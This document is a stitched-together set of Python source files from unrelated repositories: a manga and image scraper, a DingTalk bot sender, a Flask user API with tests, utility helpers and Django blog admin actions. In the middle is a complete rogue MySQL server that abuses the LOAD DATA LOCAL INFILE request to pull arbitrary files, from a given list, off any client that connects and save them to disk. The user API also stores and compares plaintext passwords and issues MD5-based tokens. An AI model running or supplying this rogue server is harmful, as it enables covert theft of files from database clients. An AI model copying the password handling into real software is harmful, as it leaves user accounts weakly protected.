use module if matched, otherwise we use universal downloader
"""
m, url = url_to_module(url)
m.prefer_download_list(url)
def download_main(
download: Callable[..., None],
download_playlist: Callable[..., None],
urls: List[str],
):
for url in urls:
if re.match(r"https?://", url) is None:
url = "http://" + url
if prefer_list:
download_playlist(url)
else:
download(url)
def parse_main(**kwargs):
logging.basicConfig(format="[%(levelname)s] %(message)s")
parser = ArgumentParser(
prog="ct-get",
usage="ct-get [OPTION] ... URL...",
description="tool for cartoon downloader",
)
# version info
parser.add_argument(
"-v", "--version", action="version", version=cartoon.__version__
)
# 命令分组, 便于分割
run_grp = parser.add_argument_group("Dry run options", "(no actual download)")
run_grp.add_mutually_exclusive_group()
run_grp.add_argument(
"-i",
"--info",
action="store_true",
help="Print extracted information with URLs",
)
# 下载选项
download_grp = parser.add_argument_group("Download options")
# debug 会输出一些信息
download_grp.add_argument(
"-d",
"--debug",
action="store_true",
help="Show traceback and other debug infomation",
)
# 下载的是列表
download_grp.add_argument(
"-l", "--playlist", action="store_true", help="prefer to download list"
)
# 将args参数赋予URL
parser.add_argument("URL", nargs="*", help=argparse.SUPPRESS)
args = parser.parse_args()
if args.debug:
logging.getLogger().setLevel(logging.DEBUG)
global prefer_list
if args.playlist:
prefer_list = True
URLs: List[str] = []
URLs.extend(args.URL)
download_main(any_download, any_download_playlist, URLs)
def main(**kwargs):
"""
inner function
"""
parse_main(**kwargs)
```
#### File: cartoon/extractors/fzdm.py
```python
import re
from bs4 import BeautifulSoup
from cartoon.common import *
IMAGE_HOST = "http://p3.manhuapan.com/"
HOST = "https://manhua.fzdm.com/"
SITE_NAME = "风之动漫"
def get_bs_element(content: str) -> BeautifulSoup:
bs = BeautifulSoup(content, "html.parser")
return bs
def get_next_page_link(current: str, content: str) -> Optional[str]:
bs = get_bs_element(content)
a_s = bs.find_all("a", "pure-button-primary")
a = list(filter(lambda tag: tag.string == "下一页", a_s))
if not a:
return None
node = a[0]
if node.string == "下一页":
path_spl = current.split("?")[0].split("/")
path_spl.pop(-1)
appended: str = node["href"]
path_spl.append(appended)
r = "/".join(path_spl)
return r
return None
def get_image_name(content: str) -> Optional[str]:
bs = get_bs_element(content)
a = bs.find("a", attrs={"class": "button-success"})
return a.string
def get_target_img_url(content: str) -> Optional[str]:
pattern = r'var mhurl="([\w\/.]+)'
result = match1(content, (pattern)) or []
target = result[0]
if not target:
return None
return IMAGE_HOST + target
def get_title(content: str) -> str:
bs = get_bs_element(content)
title: str = bs.title.get_text()
title = title.replace(SITE_NAME, "").strip()
return title
def get_filename(img_url: str, title: str, filename: str) -> str:
return filename + "." + img_url.split(".")[-1]
def prefer_download_list(url: str):
pass
def prefer_download(url: str):
print(url)
content: Optional[str] = None
content = str(get_content(url), encoding="utf-8")
while content:
target_url = get_target_img_url(content)
title = get_title(content)
filename = get_image_name(content)
if target_url and filename:
target_filename = get_filename(target_url, title, filename)
url_save(
target_url, target_filename,
)
next_page = get_next_page_link(url, content)
if not next_page:
content = None
else:
url = next_page
content = str(get_content(next_page), encoding="utf-8")
```
#### File: cartoon/extractors/jav.py
```python
import re
from bs4 import BeautifulSoup
from cartoon.util import log
from cartoon.common import *
HOST = "https://www.jav468.com/"
SITE_NAME = "_"
def get_bs_element(content: str) -> BeautifulSoup:
bs = BeautifulSoup(content, "html.parser")
return bs
def get_title(content: str) -> str:
bs = get_bs_element(content)
return bs.title.string
def get_all_links_for_list(content: str) -> List[str]:
bs = get_bs_element(content)
result: List[str] = []
wrapper = bs.findAll("div", attrs={"class": "thumbnail"})
for div in wrapper:
for child in div.children:
if child.name == "a":
result.append(child.attrs["href"])
return result
def get_imgs_from_page(content: str) -> List[str]:
bs = get_bs_element(content)
wrapper = bs.find("figure", attrs={"class": "wp-block-image"})
result: List[str] = []
for child in wrapper.descendants:
if child.name == "noscript":
for chi in child.descendants:
result.append(chi.attrs["src"])
return result
def download_list(url: str):
content: Optional[str] = str(get_content(url), encoding="utf-8")
if not content:
return
all_link = get_all_links_for_list(content)
for link in all_link:
download_one(link)
log.i("downloaded " + link)
if url.endswith("/"):
url = str(url[:-1])
items = url.split("/")
page = items.pop(-1)
newUrl = "/".join((items + [str(int(page) + 1)]))
download_list(newUrl)
def download_one(url: str):
print(url)
content: Optional[str] = None
content = str(get_content(url), encoding="utf-8")
images: List[str] = get_imgs_from_page(content)
if len(images) > 300:
return
folder = get_title(content)
safe_f = "".join(
[c for c in folder if c.isalpha() or c.isdigit() or c == " "]
).rstrip()
url_file_tuple: List[Tuple[str, str]] = [
(img, img.split("/")[-1]) for img in images
]
urls_save(url_file_tuple, safe_f)
prefer_download = download_one
prefer_download_list = download_list
```
#### File: cartoon/extractors/mz.py
```python
import re
from bs4 import BeautifulSoup
from cartoon.util import log
from cartoon.common import *
HOST = "http://meizi.info/"
SITE_NAME = "_"
def get_bs_element(content: str) -> BeautifulSoup:
bs = BeautifulSoup(content, "html.parser")
return bs
def get_title(content: str) -> str:
bs = get_bs_element(content)
return bs.title.string
def get_images_from_page(content: str) -> List[str]:
result: List[str] = []
bs = get_bs_element(content)
wrapper = bs.findAll("article", attrs={"class": "article-content"})
for div in wrapper:
for child in div.descendants:
if child.name == "img":
result.append(child.attrs["src"])
return result
def download_list(url: str):
pass
def download_one(url: str):
print(url)
content: str = str(get_content(url), encoding="utf-8")
images: List[str] = get_images_from_page(content)
folder = get_title(content)
safe_f = "".join(
[c for c in folder if c.isalpha() or c.isdigit() or c == " "]
).rstrip()
url_file_tuple: List[Tuple[str, str]] = [
(img, img.split("/")[-1]) for img in images
]
urls_save(url_file_tuple, safe_f)
prefer_download = download_one
prefer_download_list = download_list
if __name__ == "__main__":
url = "http://meizi.info/htm-data-7-1902-3441888.html"
download_one(url)
```
#### File: cartoon/util/log.py
```python
import os, sys
import time
def sprint(text: str, *colors) -> str:
return text
def println(text: str, *colors):
sys.stdout.write(sprint(text, *colors) + "\n")
def print_err(text: str, *colors):
sys.stderr.write(sprint(text, *colors) + "\n")
def print_log(text: str, *colors):
sys.stderr.write(sprint(text, *colors) + "\n")
def i(message: str):
print_log(message)
def yes_or_no(message: str) -> bool:
ans = str(input("%s (y/N)" % message)).lower().strip()
if ans == "y":
return True
return False
class SimpleProgressBar:
_displayed: bool = False
_received: int = 0
_speed: str = '0'
_bar: str = ""
def __init__(self, totol_size: int):
self.totol_size = totol_size
self.last_updated = time.time()
totol = round(self.totol_size / (1024 * 1024), 1)
percent = (self._received + 0.01) / totol
self._bar = "{percent}%% {recv}/{totol}MB"
def update(self):
self._displayed = True
perecent = round(self._received * 100 / self.totol_size, 1)
bar = self._bar.format(percent=str(perecent), recv=str(self._received), totol=str(self.totol_size))
sys.stdout.write("\r" + bar + "\r")
sys.stdout.flush()
def update_received(self, n: int):
self._received += n
time_diff = time.time() - self.last_updated
bytes_ps = n / time_diff if time_diff else 0
if bytes_ps > 1024 ** 3:
self._speed = "{:>4.0f} GB/s".format(bytes_ps / 1024 ** 3)
elif bytes_ps >= 1024 ** 2:
self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)
elif bytes_ps >= 1024:
self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)
else:
self.speed = '{:4.0f} B/s'.format(bytes_ps)
self.last_updated = time.time()
self.update()
def update_piece(self, n: int):
self.current_piece = n
def done(self):
if self._displayed:
print()
self._displayed = False
class CountProgressBar:
_displayed: bool = False
_received: int = 0
_speed: str = '0'
_bar: str = ""
def __init__(self, totol_count: int):
self.totol_count = totol_count
percent = (self._received + 0.01) / totol_count
self._bar = "{percent}%% {recv}/{totol}"
def update(self):
self._displayed = True
perecent = round(self._received * 100 / self.totol_size, 1)
bar = self._bar.format(percent=str(perecent), recv=str(self._received), totol=str(self.totol_size))
sys.stdout.write("\r" + bar + "\r")
sys.stdout.flush()
def update_received(self, n: int):
self._received += n
self.update()
def done(self):
if self._displayed:
print()
self._displayed = False
``` |
{
"source": "jiazifa/dingTalkRobotHelper",
"score": 2
} |
#### File: jiazifa/dingTalkRobotHelper/app.py
```python
import sys
from flask import Flask, render_template, request
from collections import namedtuple
Robot = namedtuple('Robot', ['name', 'key', 'push_title', 'access_token', 'access_secret'])
def parse_params(request):
""" 从一个Request实例中解析params参数
Args:
request: flask.request 实例对象
Return: 一个解析过的字典对象,如果没有解析出,则返回一个空的字典对象
"""
r = request
d = {}
if r.method == "GET":
if json:= r.args or r.get_json():
d = dict(json)
if r.method == "POST":
if json:= r.get_json() or r.args:
d = dict(json)
if not d:
d = dict(r.values)
return d
def find_robot_by_key(robots, key):
rs = list([Robot(r['name'], r['key'], r['push_title'], r['access_token'], r['access_secret']) for r in robots])
result = list(filter(lambda r: r.key == key, rs))
return result[-1]
app = Flask(__name__, static_folder='static', template_folder='templates')
config = {
'name': '钉钉小助手',
'robots': [{
'name': '',
'key': '',
'push_title': '',
'access_token': '',
'access_secret': '',
}]
}
try:
import local_setting
config.update(local_setting.config)
except ImportError:
pass
@app.route('/')
def index():
return render_template('index.html', config=config)
@app.route('/execute', methods=["POST"])
def execute():
params = parse_params(request)
key = str(params['key'])
content = str(params['content'])
atAll = bool(params['atAll'])
robot = find_robot_by_key(config['robots'], key)
if not robot:
return {'status': 'error', 'msg': '未找到机器人'}
try:
from dingtalkchatbot.chatbot import DingtalkChatbot, ActionCard, FeedLink, CardItem
new_webhook = 'https://oapi.dingtalk.com/robot/send?access_token=' + robot.access_token
xiaoding = DingtalkChatbot(new_webhook, secret=robot.access_secret, pc_slide=True, fail_notice=False)
xiaoding.send_markdown(title=robot.push_title, text=content, is_at_all=atAll)
return {'status': 'ok', 'msg': '发送成功'}
except ImportError:
return {'status': 'error', 'msg': '请引入 dingtalkchatbot 模块'}
except Exception as error:
return {'status': 'error', 'msg': '发送失败' + str(error)}
if __name__ == "__main__":
app.run(debug=False, port=5000, host='0.0.0.0')
``` |
{
"source": "jiazifa/sky_main",
"score": 2
} |
#### File: app/utils/errors.py
```python
from app.utils.response import response_error
class ApiError:
@classmethod
def get_error(cls, error_code):
raise NotImplementedError
class CommonError(ApiError):
@classmethod
def get_error(cls, error_code: int=9999):
switcher = {
# 未知错误
9999: response_error(error_code=9999, msg="unknown_error", http_code=400),
# 参数不全或错误
40000: response_error(
error_code=40000, msg="args_missing_or_wrong", http_code=400
),
# token 过期
40204: response_error(error_code=40204, msg="token expired", http_code=400),
# 需要权限
43000: response_error(
error_code=43000, msg="need_permission", http_code=401
),
# 资源不存在
44000: response_error(error_code=44000, msg="url_not_found", http_code=404),
}
resp = switcher.get(error_code or 9999)
assert resp != None
return resp
@classmethod
def error_toast(cls, msg="error_message"):
return response_error(error_code=40001, msg=msg, http_code=400)
class UserError(CommonError):
""" 用户模块下的错误类型包装 """
@classmethod
def get_error(cls, error_code):
switcher = {
# 账号已存在
40200: response_error(
error_code=40200, msg="account_exsist", http_code=400
),
# 无此账号,无法找出用户
40203: response_error(error_code=40203, msg="no_account", http_code=400),
}
return switcher.get(error_code) or super(UserError, cls).get_error(error_code)
```
#### File: app/utils/regex.py
```python
import re
from typing import Optional
def is_emoji(content: str) -> bool:
""" judge str is emoji
Args: str type
Return : Bool type , return True if is Emoji , else False
"""
if not content:
return False
if u"\U0001F600" <= content and content <= u"\U0001F64F":
return True
elif u"\U0001F300" <= content and content <= u"\U0001F5FF":
return True
elif u"\U0001F680" <= content and content <= u"\U0001F6FF":
return True
elif u"\U0001F1E0" <= content and content <= u"\U0001F1FF":
return True
else:
return False
def is_link(url: Optional[str]) -> bool:
""" 验证是否是一个链接
Args:
url: 需要验证的字符
Return: 如果是合法的链接,返回 True ,否则返回 False
"""
regex = r'(https?)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]'
result: Optional[re.Match] = re.match(regex, url)
return False if not result else True
def is_phone(content: str) -> bool:
""" 验证是否是一个手机号
Args:
url: 需要验证的号码
Return: 如果是合法的,返回 True ,否则返回 False
"""
regex = r'1[3|4|5|7|8][0-9]{9}'
result: Optional[re.Match] = re.match(regex, content)
return False if not result else True
def is_email(content: str) -> bool:
""" 验证是否是一个邮箱
Args:
url: 需要验证的邮箱
Return: 如果是合法的,返回 True ,否则返回 False
"""
regex = r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)'
result: Optional[re.Match] = re.match(regex, content)
return False if not result else True
```
#### File: app/utils/strings.py
```python
import hashlib
import random
import datetime
import time
import re
from .regex import is_emoji
from typing import Dict, List, Optional
def get_unix_time_tuple(
date = datetime.datetime.now(),
millisecond: bool = False
) -> str:
""" get time tuple
get unix time tuple, default `date` is current time
Args:
date: datetime, default is datetime.datetime.now()
millisecond: if True, Use random three digits instead of milliseconds, default id False
Return:
a str type value, return unix time of incoming time
"""
time_tuple = time.mktime(date.timetuple())
time_tuple = round(time_tuple * 1000) if millisecond else time_tuple
second = str(int(time_tuple))
return second
def get_date_from_time_tuple(unix_time: str = get_unix_time_tuple(), formatter: str = '%Y-%m-%d %H:%M:%S') -> str:
""" translate unix time tuple to time
get time from unix time
Args:
unix_time: unix time tuple
formatter: str time formatter
Return:
a time type value, return time of incoming unix_time
"""
if len(unix_time) == 13:
unix_time = str(float(unix_time) / 1000)
t = int(unix_time)
time_locol = time.localtime(t)
return time.strftime(formatter, time_locol)
def getmd5(code: str) -> Optional[str]:
""" return md5 value of incoming code
get md5 from code
Args:
code: str value
Return:
return md5 value of code
"""
if code:
md5string = hashlib.md5(code.encode('utf-8'))
return md5string.hexdigest()
return None
def get_random_num(digit: int = 6) -> str:
""" get a random num
get random num
Args:
digit: digit of the random num, limit (1, 32)
Return:
return Generated random num
"""
if digit is None:
digit = 1
digit = min(max(digit, 1), 32) # 最大支持32位
result = ""
while len(result) < digit:
append = str(random.randint(1, 9))
result = result + append
return result
def contain_emoji(content: str) -> bool:
""" judge str contain emoji str
Args: str type
Return : Bool type, return True if contain Emoji, else False
"""
for c in content:
if is_emoji(c):
return True
return False
def get_domain(url: str) -> str:
""" get domain from url by given
Args: str type
Return: str type, return domain if can get
"""
from urllib.parse import urlparse
parsed_uri = urlparse(url)
domain = '{uri.netloc}'.format(uri=parsed_uri)
return domain
def filter_all_img_src(content: str) -> List[str]:
replace_pattern = r'<[img|IMG].*?>' # img标签的正则式
img_url_pattern = r'.+?src="(\S+)"' # img_url的正则式
replaced_img_url_list: List[str] = []
img_url_list = []
need_replace_list = re.findall(replace_pattern, content) # 找到所有的img标签
for tag in need_replace_list:
imgs = re.findall(img_url_pattern, tag)
if imgs:
img_url_list.append(imgs[0]) # 找到所有的img_url
return img_url_list
```
#### File: app/views/user.py
```python
from typing import Optional, Dict
from flask import request, current_app, g, Blueprint
from app.utils import UserError, CommonError, NoResultFound, MultipleResultsFound
from app.utils import response_error, response_succ
from app.utils import get_random_num, get_unix_time_tuple, getmd5
from app.utils import session, parse_params, get_current_user, get_logger, redis_client
from app.utils import login_require, get_token_from_request, is_phone, is_email
from app.model import User, LoginRecordModel
api = Blueprint("user", __name__)
logger = get_logger(__name__)
def register():
params = parse_params(request)
email: str = params.get("email")
password: str = params.get("password")
q = session.query(User).filter(User.email == email, User.password == password)
exsist_user = session.query(q.exists()).scalar()
if exsist_user:
return UserError.get_error(error_code=40200)
user = User(email, password=password)
try:
session.add(user)
session.commit()
payload: Dict[str, int] = {"user_id": user.id}
return response_succ(body=payload)
except Exception as e:
return CommonError.get_error(error_code=9999)
def login():
params = parse_params(request)
email: Optional[str] = params.get("email")
password: Optional[str] = params.get("password")
if not email or not password:
return CommonError.get_error(error_code=40000)
try:
exsist_user: User = session.query(User).filter_by(
email=email, password=password
).one()
login_time: str = get_unix_time_tuple()
log_ip: str = request.args.get("user_ip") or request.remote_addr
record: LoginRecordModel = LoginRecordModel(exsist_user.id, log_ip)
record.save()
# update token
token: str = getmd5("-".join([email, password, get_random_num(2)]))
# 保存到redis中, 设置有效时间为7天
cache_key: str = exsist_user.get_cache_key
time: int = 60 * 60 * 24 * 7
redis_client.client.set(cache_key, token, time)
redis_client.client.set(token, cache_key, time)
payload: Dict[str, any] = {"token": token, "user_id": exsist_user.id}
return response_succ(body=payload)
except NoResultFound:
return UserError.get_error(40203)
except Exception as e:
logger.error(e)
return CommonError.get_error(9999)
@login_require
def logout():
""" 登出
设置redis时间为过期
"""
params = parse_params(request)
token = get_token_from_request(request)
user: User = get_current_user()
cache_key: str = user.get_cache_key
redis_client.client.delete(cache_key, token)
return response_succ(body={})
@login_require
def user_info():
""" 获得用户基本信息
需要登录权限
"""
params = parse_params(request)
user: User = get_current_user()
payload: Dict[str, Any] = user.info_dict
return response_succ(body=payload)
@login_require
def modify_user_info():
params = parse_params(request)
user: User = get_current_user()
# 用户昵称
nickname =params.get("nickname")
phone = params.get("phone")
sex = int(params.get("sex"))
email = params.get("email")
if nickname:
user.nickname = nickname
if phone:
if is_phone(str(phone)) and len(phone) == 11:
user.mobilephone = phone
else: return CommonError.error_toast(msg="手机号码格式错误")
if sex:
if sex in (1, 0):
user.sex = sex
else: return CommonError.error_toast(msg="性别设置错误")
if email:
if is_email(email):
user.email = email
else: return CommonError.error_toast(msg="邮箱格式错误")
user.save(commit=True)
payload: Dict[str, Any] = user.info_dict
return response_succ(body=payload)
def mail_one_time_code(f: str):
pass
def setup_url_rule(api: Blueprint):
# 注册
api.add_url_rule("/register", view_func=register, methods=["POST"])
# 登录
api.add_url_rule("/login", view_func=login, methods=["POST"])
# 修改信息
api.add_url_rule("/modify_info", view_func=modify_user_info, methods=["POST"])
# 获得用户信息
api.add_url_rule("/info", view_func=user_info, methods=["GET"])
# 登出
api.add_url_rule("/logout", view_func=logout, methods=["POST"])
setup_url_rule(api)
```
#### File: sky_main/tests/test_0user.py
```python
import sys
from os import path
import json
import pytest
import random
from flask import Flask
from .helper import *
# 将路径添加到 sys.path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
class TestUser:
def setup_method(self):
from app.utils import getmd5
self._email = DEFAULT_LOGIN_PARAMS.get("email")
self._password = DEFAULT_LOGIN_PARAMS.get("password")
def test_register_on_error(self, client):
password: str = <PASSWORD>
rv = client.post(
"/user/register", json={"email": self._email, "password": self._password,}
)
rv = client.post(
"/user/register", json={"email": self._email, "password": <PASSWORD>,}
)
assert rv.status_code == 400
def test_login(self, client):
password = <PASSWORD>
rv = client.post(
"/user/login", json={"email": self._email, "password": self._password,}
)
assert rv.status_code == 200
body = rv.json["data"]
self._token = body.get("token")
self._user_id = body.get("user_id")
assert body.get("user_id") != None
assert body.get("token") != None
def test_info(self, client):
token = get_token(client, DEFAULT_LOGIN_PARAMS)
rv = client.get("/user/info", headers={"token": token})
assert rv.status_code == 200
body = rv.json["data"]
assert body.get("email") == self._email
assert body.get("account_status") == 1
assert body.get("user_id") != 0
def test_change_info(self, client):
token = get_token(client, DEFAULT_LOGIN_PARAMS)
nickname = random.choice(["测试1", "测试2", "测试3", "测试4"])
sex = 1
phone = '13859943743'
rv = client.post("/user/modify_info", json={"nickname": nickname, "phone": phone, "sex": sex}, headers={"token": token})
print(rv.json)
assert rv.status_code == 200
rv = client.get("/user/info", headers={"token": token})
body = rv.json["data"]
print(body)
assert body.get("email") == self._email
assert body.get("account_status") == 1
assert body.get("user_id") == 1
assert body.get("nickname") == nickname
assert body.get("sex") == sex
assert body.get("phone") == phone
``` |
{
"source": "jiazifa/ToolHUB",
"score": 3
} |
#### File: ToolHUB/utils/helpers.py
```python
from typing import Union, Dict
import sys
import logging
LOGGERS: Dict[str, logging.Logger] = {}
def get_logger(name: Union[None, str] = None) -> logging.Logger:
""" 获得一个logger 实例,用来打印日志
Args:
name: logger的名称
Return:
返回一个logger实例
"""
global LOGGERS
if not name:
name = __name__
has = LOGGERS.get(name)
if has:
return has
logger = logging.getLogger(name=name)
stream_handler = logging.StreamHandler(sys.stdout)
LOG_LEVEL = 'DEBUG'
LOGGING_FORMATTER = "%(levelname)s - %(asctime)s - process: %(process)d - %(filename)s - %(name)s - %(lineno)d - %(module)s - %(message)s" # 每条日志输出格式
logger.setLevel(LOG_LEVEL)
stream_handler.setLevel(LOG_LEVEL)
formatter = logging.Formatter(LOGGING_FORMATTER)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
LOGGERS.setdefault(name, logger)
return logger
```
#### File: ToolHUB/utils/parser.py
```python
from lxml import etree
from typing import Union
def parser_first_text_or_content_if_could(html: etree._Element,
query_path: str) -> Union[str, None]:
"""
如果解析出的内容是一个数组,默认取的第一个
"""
nodes = html.xpath(query_path)
if not nodes:
return None
if len(nodes) > 0:
desc = nodes[0]
if hasattr(desc, 'text'):
return str(desc.text)
return str(desc)
return None
``` |
{
"source": "jib1337/Rogue-MySql-Server",
"score": 2
} |
#### File: jib1337/Rogue-MySql-Server/RogueSQL.py
```python
import socket
import asyncore
import asynchat
import struct
import logging
import logging.handlers
import argparse
import os
import sys
import signal
DEBUG = False
PORT = 3306
LOG_FILE = 'rogueSQL.log'
VERBOSE = False
SAVE_FOLDER = os.sep.join(os.path.abspath(__file__).split(os.sep)[:-1]) + os.sep + 'Downloads' + os.sep
ATTEMPTS = 3
# Logging stuff
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
tmp_format = logging.handlers.WatchedFileHandler(LOG_FILE, 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
tmp_format
)
parser = argparse.ArgumentParser(prog='RogueSQL', description='Rogue MySQL server')
parser.add_argument("-p", metavar='port', help='port to run the server on', type=int)
parser.add_argument("-f", metavar='filename', help="specify a single filename to retrieve")
parser.add_argument("-l", metavar='filelist', help="path to file with list of files for download")
parser.add_argument("-a", metavar='attempts', help='how many times to request a file before giving up', type=int)
parser.add_argument("-v", action='store_true', help='toggle verbosity')
parser.add_argument("-d", action='store_true', help='log debug messages')
def handler(sig, frame):
print('[+] Exiting now...')
sys.exit(0)
class LastPacket(Exception):
pass
class OutOfOrder(Exception):
pass
class mysql_packet(object):
packet_header = struct.Struct('<HbB')
packet_header_long = struct.Struct('<HbbB')
def __init__(self, packet_type, payload):
if isinstance(packet_type, mysql_packet):
self.packet_num = packet_type.packet_num + 1
else:
self.packet_num = packet_type
self.payload = payload
def __str__(self):
payload_len = len(self.payload)
if payload_len < 65536:
header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num % 255)
else:
header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num % 255)
result = "{0}{1}".format(
header,
self.payload
)
return result
def __repr__(self):
return repr(str(self))
@staticmethod
def parse(raw_data):
packet_num = ord(raw_data[0])
payload = raw_data[1:]
return mysql_packet(packet_num, payload)
class http_request_handler(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self, sock=addr[0])
self.addr = addr[1]
self.ibuffer = []
self.filenumber = 0
self.current_filename = ''
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'Auth'
self.logined = False
self.push(
mysql_packet(
0,
"".join((
'\x0a', # Protocol
'5.6.28-0ubuntu0.14.04.1' + '\0',
'\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
)) )
)
self.order = 1
self.states = ['LOGIN', 'CAPS', 'ANY']
def push(self, data):
if DEBUG:
log.debug('Pushed:', data)
data = str(data)
asynchat.async_chat.push(self, data)
def collect_incoming_data(self, data):
self.ibuffer.append(data)
def found_terminator(self):
data = "".join(self.ibuffer)
self.ibuffer = []
if self.state == 'LEN':
len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
if len_bytes < 65536:
self.set_terminator(len_bytes)
self.state = 'Data'
else:
self.state = 'MoreLength'
elif self.state == 'MoreLength':
if data[0] != '\0':
self.push(None)
self.close_when_done()
else:
self.state = 'Data'
elif self.state == 'Data':
packet = mysql_packet.parse(data)
try:
if self.order != packet.packet_num:
raise OutOfOrder()
else:
self.order = packet.packet_num + 2
if packet.packet_num == 0:
global prevFilename
global failCount
if packet.payload[0] == '\x03':
# Set the current file
self.current_filename = filelist[self.filenumber]
if DEBUG:
log.info('Previous request: %s; Next request: %s' % (prevFilename, self.current_filename))
if self.current_filename == prevFilename:
# Means a failed request previously
failCount += 1
if failCount != ATTEMPTS:
print('[-] Moving on from this file in ' + str(ATTEMPTS - failCount) + ' attempt/s')
else:
print('[-] Moving on to next file')
del filelist[self.filenumber]
failCount = 0
if len(filelist) == 1:
print('[+] End of file list reached')
print('[+] Exiting now...')
sys.exit(0)
self.current_filename = filelist[self.filenumber]
PACKET = mysql_packet(
packet,
'\xFB{0}'.format(self.current_filename)
)
if DEBUG:
log.info('Requesting for file: %s' % self.current_filename)
print('[+] Requesting %s' % self.current_filename)
prevFilename = self.current_filename
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(PACKET)
elif packet.payload[0] == '\x1b':
if DEBUG:
log.info('SelectDB')
self.push(mysql_packet(
packet,
'\xfe\x00\x00\x02\x00'
))
raise LastPacket()
elif packet.payload[0] in '\x02':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
elif packet.payload == '\x00\x01':
self.push(None)
self.close_when_done()
else:
raise ValueError()
else:
# Recieved file handling
if self.sub_state == 'File':
if len(data) == 1:
if packet.packet_num < 256 and self.filenumber < len(filelist) - 1:
self.current_filename = filelist[self.filenumber]
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(
mysql_packet(packet, '\xFB{0}'.format(self.current_filename))
)
else:
self.push(
mysql_packet(packet, '\0\0\0\x02\0\0\0')
)
sys.exit(0)
else:
with open(SAVE_FOLDER + os.path.normpath(self.current_filename).split(os.sep)[-1], 'ab') as fl:
fl.write(data)
if self.current_filename not in obtained:
print('[+] File %s obtained' % self.current_filename)
obtained.add(self.current_filename)
del filelist[self.filenumber]
self.set_terminator(3)
self.state = 'LEN'
self.order = packet.packet_num + 1
elif self.sub_state == 'Auth':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
else:
raise ValueError('Unknown packet')
except LastPacket:
if DEBUG:
log.info('Last packet')
self.state = 'LEN'
self.sub_state = None
self.order = 0
self.set_terminator(3)
except OutOfOrder:
if DEBUG:
log.warning('Packets out of order')
self.push(None)
self.close_when_done()
else:
if DEBUG:
log.error('Unknown state')
self.push('None')
self.close_when_done()
class mysql_listener(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
if not sock:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
try:
self.bind(('', PORT))
except socket.error:
exit()
self.listen(5)
def handle_accept(self):
pair = self.accept()
if pair is not None:
log.info('Data recieved from: %s' % pair[1][0])
print('[+] Data recieved from %s' % pair[1][0])
tmp = http_request_handler(pair)
if __name__ == '__main__':
filelist = list()
obtained = set()
failCount = 0
prevFilename = ''
args = parser.parse_args()
if args.d:
DEBUG = args.d
if args.l:
try:
filelist += filter(None, open(args.l, 'r').read().split('\n'))
except IOError:
print('[-] Error: List file not found')
sys.exit(1)
else:
if not args.f:
print('[-] Error: No files specified')
sys.exit(1)
else:
filelist.append(args.f)
if args.p:
PORT = args.p
if args.a:
ATTEMPTS = args.a
if args.v:
VERBOSE = args.v
if not os.path.exists(SAVE_FOLDER):
os.mkdir(SAVE_FOLDER)
filelist.append('')
print('Rogue MySQL Server')
print('[+] Target files:')
for file in filelist:
if file is not '': print('\t' + file)
print('[+] Starting listener on port ' + str(PORT) + '... Ctrl+C to stop\n')
listener = mysql_listener()
signal.signal(signal.SIGINT, handler)
asyncore.loop()
``` |
{
"source": "jibaku/blogging",
"score": 2
} |
#### File: blogging/blogging/actions.py
```python
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext
from blogging.models import Post
# Post Actions
def make_published(modeladmin, request, queryset):
"""Mark the given posts as published."""
count = queryset.update(status=Post.PUBLISHED)
message = ungettext(
u'%(count)d post was successfully marked as published.',
u'%(count)d posts were successfully marked as published',
count
) % {'count': count}
modeladmin.message_user(request, message)
make_published.short_description = _(u"Mark selected stories as published")
def make_draft(modeladmin, request, queryset):
"""Mark the given posts as draft."""
count = queryset.update(status=Post.DRAFT)
message = ungettext(
u'%(count)d post was successfully marked as draft.',
u'%(count)d posts were successfully marked as draft',
count
) % {'count': count}
modeladmin.message_user(request, message)
make_draft.short_description = _(u"Mark selected stories as draft")
def make_selected(modeladmin, request, queryset):
"""Mark the given posts as selected."""
count = queryset.update(selected=True)
message = ungettext(
u'%(count)d post was successfully marked as selected.',
u'%(count)d posts were successfully marked as selected',
count
) % {'count': count}
modeladmin.message_user(request, message)
make_selected.short_description = _(u"Mark selected stories as selected")
def make_post_type_action(key, name):
"""Create Post action to update post_type."""
func_name = 'define_as_{}'.format(name.lower())
def action_f(modeladmin, req, qset):
count = qset.update(post_type=key)
message = ungettext(
u'%(count)d post was successfully marked as %(name)s.',
u'%(count)d posts were successfully marked as %(name)s',
count
) % {'count': count, 'name': name}
modeladmin.message_user(req, message)
action = action_f
action.__name__ = func_name
return (func_name, (action, func_name, "define selected as %s" % name))
# Category Actions
def update_counters(modeladmin, request, queryset):
"""Update the counters for the given categories."""
count = 0
for category in queryset:
category.update_counters()
count += 1
message = ungettext(
u'%(count)d category has been updated.',
u'%(count)d categories had been updated.',
count
) % {'count': count}
modeladmin.message_user(request, message)
